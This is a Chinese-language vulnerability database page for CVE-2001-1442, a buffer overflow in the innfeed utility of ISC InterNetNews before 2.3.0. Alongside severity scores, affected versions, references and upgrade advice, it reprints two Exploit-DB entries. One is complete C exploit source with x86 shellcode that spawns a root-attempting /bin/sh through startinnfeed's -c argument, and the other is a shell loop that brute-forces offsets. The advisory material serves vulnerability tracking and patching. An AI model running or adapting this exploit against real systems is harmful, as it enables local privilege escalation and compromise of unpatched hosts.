CVE-2001-1442
CVSS4.6
发布时间 :2001-04-21 00:00:00
修订时间 :2008-09-05 16:26:34
NMCOE    

[原文]Buffer overflow in innfeed for ISC InterNetNews (INN) before 2.3.0 allows local users in the "news" group to gain privileges via a long -c command line argument.


[CNNVD]ISC InterNetNews缓冲区溢出漏洞(CNNVD-200104-017)

        ISC InterNetNews (INN)2.3.0之前版本中的innfeed存在缓冲区溢出漏洞。"news"组中的本地用户可以借助超长-c命令行参数提升权限。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:isc:inn:2.2.1ISC INN 2.2.1
cpe:/a:isc:inn:2.2.2ISC INN 2.2.2
cpe:/a:isc:inn:2.1ISC INN 2.1
cpe:/a:isc:inn:2.0ISC INN 2.0
cpe:/a:isc:inn:2.2ISC INN 2.2
cpe:/a:isc:inn:2.2.3ISC INN 2.2.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1442
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1442
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200104-017
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/943536
(UNKNOWN)  CERT-VN  VU#943536
http://www.securityfocus.com/bid/2620
(PATCH)  BID  2620
http://www.securityfocus.com/archive/1/178011
(PATCH)  BUGTRAQ  20010418 Re: Innfeed Buffer Overflow
http://xforce.iss.net/xforce/xfdb/6398
(UNKNOWN)  XF  innfeed-c-bo(6398)
http://securitytracker.com/id?1001353
(UNKNOWN)  SECTRACK  1001353
http://archives.neohapsis.com/archives/bugtraq/2001-04/0311.html
(UNKNOWN)  BUGTRAQ  20010418 Innfeed Buffer Overflow

- 漏洞信息

ISC InterNetNews缓冲区溢出漏洞
中危 缓冲区溢出
2001-04-21 00:00:00 2005-10-20 00:00:00
本地  
        ISC InterNetNews (INN)2.3.0之前版本中的innfeed存在缓冲区溢出漏洞。"news"组中的本地用户可以借助超长-c命令行参数提升权限。

- 公告与补丁

        ISC recommends that users upgrade INN to 2.3.0, which features a rewritten startinnfeed utility.
        INN 2.3.1 is available:
        ISC INN 2.0
        
        ISC INN 2.1
        
        ISC INN 2.2
        
        ISC INN 2.2.1
        
        ISC INN 2.2.2
        
        ISC INN 2.2.3
        

- 漏洞信息 (20777)

ISC INN 2.x Command-Line Buffer Overflow Vulnerability (1) (EDBID:20777)
linux local
2001-04-18 Verified
0 Enrique A.
N/A [点击下载]
source: http://www.securityfocus.com/bid/2620/info

The innfeed utility, part of ISC InterNetNews, has an exploitable buffer overflow in its command-line parser. Specifically, innfeed will overflow if an overly long -c option is passed to it.

A local attacker in the news group could use this overflow to execute arbitary code with an effective userid of news, which could constitute an elevation in privileges, and the ability to alter news-owned binaries that could be run by root.

Exploits are available against x86 Linux builds of innfeed. 

/*
  x-innfeed.c

  Buffer overflow in innfeed being called from startinnfeed renders
uid(news) gid(news), startinnfeed is suid root so I have to also check
if I can manage to get root out of this ....

  Enrique A. Sanchez Montellano
  (@defcom.com ... Yes is only @defcom.com)
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>

#define OFFSET  0
#define ALIGN   0
#define BUFFER  470

// MANDRAKE, REDHAT, etc....

#ifdef REDHAT
/* optimized shellcode ;) (got rid of 2 bytes from aleph1's) */
//static char shellcode[]=
//"\xeb\x15\x5b\x89\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x31\xd2\xcd\x80\xe8\xe6\xff\xff\xff/bin/sh";
char shellcode[] = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /*setuid(0) */
             "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
             "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
             "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

#endif

#ifdef SLACKWARE
/* optimized shellcode for slackware 7.0 (non setuid(getuid()) shell) */
static char shellcode[]=
"\xeb\x15\x5b\x89\x5b\x0b\x31\xc0\x88\x43\x0a\x89\x43\x0f\xb0\x0b\x8d\x4b\x0b\x31\xd2\xcd\x80\xe8\xe6\xff\xff\xff/bin/bash1";
#endif

unsigned long get_sp(void) {
  __asm__("movl %esp, %eax");
}

void usage(char *name) {
  printf("Usage: %s <offset> <align> <buffer>\n", name);
  printf("Defcom Labs @ Spain ...\n");
  printf("Enrique A. Sanchez Montellano (@defcom.com)\n");
  exit(0);
}

int main(int argc, char **argv) {
  char *code;
  int offset = OFFSET;
  int align = ALIGN;
  int buffer = BUFFER;
  unsigned long addr;
  int i;

  if(argc > 1) offset = atoi(argv[1]);
  if(argc > 2) align = atoi(argv[2]);
  if(argc > 3) buffer = atoi(argv[3]);

  code = (char *)malloc(buffer);

  printf("[ + ] innfeed buffer overflow (passed to startinnfeed) [ + ]\n");
  printf("------------------------------------------------------------\n");
  printf("[ + ] Found by: \n\n[ + ] Alex Hernandez
(alex.hernandez@defcom.com) \n[ + ] Enrique Sanchez (@defcom.com ... Yes
is just @defcom.com)\n");
  printf("[ + ] Defcom Labs @ Spain ....\n");
  printf("[ + ] Coded by Enrique A. Sanchez Montellano (El Nahual)\n\n");

  addr = get_sp() - offset;

  printf("[ + ] Using address 0x%x\n", addr);

  for(i = 0; i <= buffer; i += 4) {
   *(long *)&code[i] = 0x90909090;
  }

  *(long *)&code[buffer - 4] = addr;
  *(long *)&code[buffer - 8] = addr;

  memcpy(code + buffer - strlen(shellcode) -8 - align, shellcode,
strlen(shellcode));

  printf("[ + ] Starting exploitation ... \n\n");

  // REDHAT, MANDRAKE ...
#ifdef REDHAT
  execl("/usr/bin/startinnfeed", "/usr/bin/startinnfeed", "-c", code, NULL);
#endif

  // SLACKWARE
#ifdef SLACKWARE
  execl("/usr/lib/news/bin/startinnfeed",
"/usr/lib/news/bin/startinnfeed", "-c", code, NULL);
#endif

  return 0;
}
		

- 漏洞信息 (20778)

ISC INN 2.x Command-Line Buffer Overflow Vulnerability (2) (EDBID:20778)
linux local
2001-04-18 Verified
0 Enrique A.
N/A [点击下载]
source: http://www.securityfocus.com/bid/2620/info
 
The innfeed utility, part of ISC InterNetNews, has an exploitable buffer overflow in its command-line parser. Specifically, innfeed will overflow if an overly long -c option is passed to it.
 
A local attacker in the news group could use this overflow to execute arbitary code with an effective userid of news, which could constitute an elevation in privileges, and the ability to alter news-owned binaries that could be run by root.
 
Exploits are available against x86 Linux builds of innfeed. 

#!/bin/ksh
L=-2000
O=40
while [ $L -lt 12000 ]
do
echo $L
L=`expr $L + 1`
./x-startinnfeed $L
done		

- 漏洞信息

19132
INN innfeed -c Parameter Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2001-04-18 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 2.3.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站